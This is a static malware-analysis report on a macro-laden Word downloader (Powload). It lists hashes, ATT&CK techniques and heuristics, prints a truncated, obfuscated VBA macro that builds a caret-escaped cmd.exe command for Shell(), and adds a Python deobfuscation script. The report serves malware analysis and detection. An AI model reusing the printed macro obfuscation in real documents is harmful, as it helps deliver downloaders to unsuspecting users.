Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9528aed437569e44…

MALICIOUS

Office (OLE)

Size: 85.5 KB
Created: 2018-08-26 23:24:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: 94a42bbf41f26a85fd589395fa2cd490
SHA-1: 293523452c6555ca24ba940c953f81269b4ad6b6
SHA-256: 9528aed437569e449b6de37fa0ccf2dcfcd9acee2f26a4fcb43eebc0f87ec779
Risk score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Word document carrying a VBA project with an AutoOpen entry point, so the macro runs as soon as the document is opened with macros enabled. The macro reaches a Shell() call to execute a command line, and the ClamAV name 'Doc.Downloader.Powload-6665633-0' classifies it as a downloader that fetches and runs a second-stage payload. The visible source is heavily obfuscated: each builder function is padded with junk 'Error n * x / y' statements whose runtime errors are swallowed by the repeated 'On Error Resume Next', and the command is assembled from short string fragments joined with '+'. The fragments that can be decoded evaluate to the tail of a cmd.exe invocation: Chr(3 + 2 + 3 + 4 + 22) is Chr(34), a double quote, and the '^' characters are cmd.exe escape characters inserted to break signature matching, so the first fragment reads 'mD /v /R " sEt na5=' once carets are stripped and runs of spaces collapsed, i.e. cmd.exe with delayed variable expansion (/V) and /R (runs the command like /C) setting an environment variable whose value is the caret-split, Base64-looking blob that follows. Because the preview is truncated before the command is complete, the download URL and the exact second-stage command cannot be recovered from the visible source.

Heuristics 7

  • ClamAV: Doc.Downloader.Powload-6665633-0 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Powload-6665633-0
  • VBA macros detected (severity: medium, 3 related findings, rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical, rule: OLE_VBA_SHELL)
    The VBA source calls Shell(), which passes a command line to the operating system for execution; this is the primitive that launches the downloader command.
  • AutoOpen macro (severity: high, rule: OLE_VBA_AUTOOPEN)
    The project defines an AutoOpen procedure, which Word runs automatically when the document is opened with macros enabled, so no user action beyond enabling content is needed.
  • VBA p-code auto-exec with execution tokens (severity: high, rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (severity: medium, rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this finding conflicts with OLE_VBA_MACROS above and with the macros.bas artifact extracted below, which show that a modern VBA project was in fact recovered; treat it as a secondary marker.
  • Embedded URL (severity: info, rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace URI that appears in ordinary Office documents; it is not a download or command-and-control indicator and should not be exported as an IOC.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10332 bytes
SHA-256: 415ec68b4fb4da81340930856d7ee7dd71bd0e1f2f53e2c21ce2ae4e757f7588
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "iatXllNlCj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "wiTZfXhjwwqSw"
Function AfcozIPiWMf()
On Error Resume Next

On Error Resume Next

On Error Resume Next

On Error Resume Next

On Error Resume Next
Error 44846 * FXGNtw * 40350 * vTRQo
   Error 54531 * bDzlH / 52027 / KrNtJB
   Error 35991 / mpPOj / wdbQm / cTzlmm
GoYhPaUqIPu = "mD" + "  /" + "v " + " /R" + " " + " " + "  " + Chr(3 + 2 + 3 + 4 + 22) + " ^" + "s^Et " + "^ " + "^  " + " n" + "^a^5="
Error 34025 / PhRIBq
EORmZia = "==^A^A" + "g^A" + "AI^" + "A^A" + "C^A^g" + "AA"
Error NLOaN / Knujpa
   Error 38620 * nulTJc
   Error jzUQn * UNLjz * nirvVj / LHpwz
nTzZtzSzvi = "I^A^A" + "CAgAA^" + "I^AA" + "C^" + "A^gA^" + "AIA^A"
Error fKCPM / zUvPLJ / 98020 * WGbzjH
MaVjo = "CAg" + "^A^A^" + "I" + "^" + "A" + "AC" + "A"
Error jWUuM * LvKkBu
zcKSz = "gAAI" + "^A^0^H^" + "A9^" + "B^weA^" + "g^" + "GA" + "^jB^A" + "dAE"
Error vqGGrT * vBFmtV
   Error 89368 / DjUfKI
   Error dSrSu / zVAjG
   Error 78689 / PNidT * GkDSt * wnokTB
   Error 94566 / TRjYjY * 71362 / wbrfl
dXAmktv = "^G^" + "A" + "^jB^Qf" + "^A^sD" + "Ar^BQ" + "Y^AUG" + "Ay^B^"
Error 83761 * 4630 / LpWHA * 19780
LzzOECkKFMD = "g" + "Y^AsD" + "A" + "^zB" + "^Q^Q" + "^A^M" + "^FA^kA" + "AI" + "^A^0G^"
AfcozIPiWMf = GoYhPaUqIPu + EORmZia + nTzZtzSzvi + MaVjo + zcKSz + dXAmktv + LzzOECkKFMD
   Error 62308 * vjoZb
End Function
Function lmclproGvjq()
On Error Resume Next

On Error Resume Next

On Error Resume Next

On Error Resume Next

On Error Resume Next

On Error Resume Next
Error 43549 / NEYZos
   Error WvGJop / ApmbAV
hTTiumr = "AlBAd^A" + "^k^E^" + "AtAQ" + "Z" + "A^s" + "^G^AvBg" + "dA4GA" + "JBwO^"
Error QABWR * tozfn
iXIin = "A" + "kC" + "^Az^B" + "^QQ^AM" + "^FA" + "^k^AA"
Error 55850 / bRhSdV
   Error 62215 * YkzfZ / GzrGI * qHjwCR
ilNKzDE = "^" + "I" + "^" + "AwC^A^U" + "^B" + "^A^U^A"
Error 4536 / SMvAjn
   Error wUUlwj / OPdYqO
   Error DlJAW / 53130
bGTwt = "0^GAk" + "^AAK" + "^" + "A" + "^U^GA" + "sBQ^a" + "^AYE" + "^" + "A^kBQ" + "Y^A8^G" + "AsB^g"
Error NhRlj * mSAIK
   Error 37222 / JzUnC / 61905 * McssrP
   Error 75510 / HtizYQ
mhILuiAfHT = "^bAc^H" + "^AvBA" + "R^A4" + "CA^x^B" + "gaA^Q" + "HA^kAw" + "^e^A^" + "k^H^AyB" + "AdA" + "s^HA" + "pA"
Error 58767 / 80498
   Error qFQjk / zACnAF / BFZtsK / fZAQE
   Error 63246 * kiJMpi
baNnZE = "^AUA^" + "ME^" + "A^6B^A^" + "JA^ACA" + "^u^BQ" + "a^A^ACA" + "^U^BAU^" + "A^0" + "^GA^" + "k^AAK"
Error 54501 * 21870 * 13027 * 67326
   Error YTtdJW * 21204 * zlfdaQ / zbOzG
aHwqjVm = "^A^g" + "G^A^" + "j^" + "BQY^" + "AUGA^" + "yBw" + "b^A" + "YGA^7^"
Error nQJiiw * lbmsAj
   Error MJiuhX * LDFRcj / 85697 * TWApFN
fwWiHTri = "A^w^" + "J^AU" + "^" + "GA4" + "BQZ^A" + "^4C^An^" + "A^" + "w^K^AIG" + "^A^3BA^" + "dAQC" + "Ar"
Error tPAEqh / YbABp
   Error qHGEF * RTwtr * 37570 * 42646
   Error SOLSFA / XcUVp / AjquuA * izIvS
kGPsAjGIUjj = "A^w^" + "J^AwFAn" + "^AwKA^M" + "GA^" + "pB^A" + "^bAIGA"
Error GMXLQ * JlqXSU
   Error djkjYT * CwYVq
BNEzf = "1^B^A" + "c^" + "AoD^A^" + "2B^gbAU" + "G^A^" + "k^" + "A^Q" + "P^A" + "M^HAB^B"
lmclproGvjq = hTTiumr + iXIin + ilNKzDE + bGTwt + mhILuiAfHT + baNnZE + aHwqjVm + fwWiHTri + kGPsAjGIUjj + BNEzf
   Error 11555 / zubBQ * zJZLr * 94582
End Function
Function UpIsMEsFUhV()
On Error Resume Next

On Error Resume Next

On Error Resume Next

On Error Resume Next

On Error Resume Next

On Error Resume Next
Error 10142 / whFQI
   Error 21348 / mGBEQw / aXrfZX / tXUNm
   Error 20750 / cSBZw
AizfofdKqz = "w^" + "U" + "AQC" + "^A7" + "A" + "^wJ" + "A^" + "g" + "DA^4^A" + "^A^O^Ac" + "C" + "A^g" + "AQPAAC"
Error 58446 / CrBBUM
   Error zwTwn * RbzDmN * 57204 * 17352
   Error 97585 / 38778 / 12815 * 30529
   Error 70586 / 45777
GFnkibbv = "^" + "Ai^Bw" + "^dAQ^H" + "A" + "k^A" + "w" + "^O^
... (truncated)
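The following Python script is an added worked example, not part of the report's tooling and not code from the malware: it re-implements by hand the string-evaluation step that turns the first builder function from the preview above (copied verbatim as constructed input) back into the command fragment the macro hands to Shell(). It assumes the fragments are joined only with '+', that Chr() receives integer arithmetic, and that '^' is to be read as the cmd.exe escape character; the helper names (evaluate_assignments, cmd_unescape, looks_like_cmd_set_stub, deobfuscate) and the CMD_SET_RE indicator are the example's own.

```python
import ast
import operator
import re

# Constructed input: the first string-builder function from the macros.bas
# preview in this report, copied verbatim (some junk lines omitted). It builds a
# cmd.exe command line from string fragments, one Chr() call and caret escapes.
VBA_SAMPLE = r'''
Function AfcozIPiWMf()
On Error Resume Next
Error 44846 * FXGNtw * 40350 * vTRQo
   Error 54531 * bDzlH / 52027 / KrNtJB
GoYhPaUqIPu = "mD" + "  /" + "v " + " /R" + " " + " " + "  " + Chr(3 + 2 + 3 + 4 + 22) + " ^" + "s^Et " + "^ " + "^  " + " n" + "^a^5="
Error 34025 / PhRIBq
EORmZia = "==^A^A" + "g^A" + "AI^" + "A^A" + "C^A^g" + "AA"
Error NLOaN / Knujpa
nTzZtzSzvi = "I^A^A" + "CAgAA^" + "I^AA" + "C^" + "A^gA^" + "AIA^A"
MaVjo = "CAg" + "^A^A^" + "I" + "^" + "A" + "AC" + "A"
zcKSz = "gAAI" + "^A^0^H^" + "A9^" + "B^weA^" + "g^" + "GA" + "^jB^A" + "dAE"
dXAmktv = "^G^" + "A" + "^jB^Qf" + "^A^sD" + "Ar^BQ" + "Y^AUG" + "Ay^B^"
LzzOECkKFMD = "g" + "Y^AsD" + "A" + "^zB" + "^Q^Q" + "^A^M" + "^FA^kA" + "AI" + "^A^0G^"
AfcozIPiWMf = GoYhPaUqIPu + EORmZia + nTzZtzSzvi + MaVjo + zcKSz + dXAmktv + LzzOECkKFMD
   Error 62308 * vjoZb
End Function
'''

# Lines that contribute nothing to the built string: the Error junk (its runtime
# errors are swallowed by On Error Resume Next), declarations and attributes.
JUNK_RE = re.compile(r'^\s*(On Error|Error\b|Function\b|End Function|Attribute\b)', re.I)
ASSIGN_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
# One concatenation operand: "literal" (with "" as an escaped quote), Chr(expr) or a variable name.
TOKEN_RE = re.compile(r'"((?:[^"]|"")*)"|Chr\$?\(([^)]*)\)|([A-Za-z_]\w*)')
OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}


def eval_int(expr):
    """Evaluate the integer arithmetic inside Chr() without eval(): only +, -, * and literals."""
    def walk(node):
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in OPS:
            return OPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError("unsupported Chr() argument: %r" % expr)
    return walk(ast.parse(expr.strip(), mode="eval").body)


def evaluate_assignments(source):
    """Replay every 'name = a + b + ...' line in order; returns {name: value}."""
    env = {}
    for line in source.splitlines():
        if JUNK_RE.match(line):
            continue
        m = ASSIGN_RE.match(line)
        if not m:
            continue
        name, rhs = m.groups()
        parts = []
        for literal, chr_arg, ident in TOKEN_RE.findall(rhs):
            if chr_arg:
                parts.append(chr(eval_int(chr_arg)))
            elif ident:
                parts.append(env.get(ident, ""))  # an undeclared name is Empty, i.e. "" in VBA
            else:
                parts.append(literal.replace('""', '"'))
        env[name] = "".join(parts)
    return env


def cmd_unescape(s):
    """Apply cmd.exe escaping: ^x becomes x (so ^^ is a literal ^); a trailing ^ is dropped."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "^":
            if i + 1 < len(s):
                out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


# Assumed indicator (the example's own): the cmd /V /R "set name= preamble before the encoded blob.
CMD_SET_RE = re.compile(r'/v\s+/[rck]\s+"\s*set\s+\w+=', re.I)


def looks_like_cmd_set_stub(cmdline):
    """True when the caret-stripped command opens with a delayed-expansion 'set' preamble."""
    return bool(CMD_SET_RE.search(" ".join(cmdline.split())))


def deobfuscate(source, result_name):
    """Return (raw concatenation, caret-unescaped command) for the named builder function."""
    env = evaluate_assignments(source)
    raw = env[result_name]
    return raw, cmd_unescape(raw)


if __name__ == "__main__":
    raw, clean = deobfuscate(VBA_SAMPLE, "AfcozIPiWMf")
    print("raw      :", raw)
    print("unescaped:", clean)
    print("cmd /V /R \"set ...\" preamble:", looks_like_cmd_set_stub(clean))
```

Run with python3 to print the raw concatenation and the caret-stripped command. The other builder functions in the preview can be pasted into VBA_SAMPLE the same way, but because the preview is cut off the final Base64 blob cannot be completed or decoded from this page, which is why the report does not name a download target.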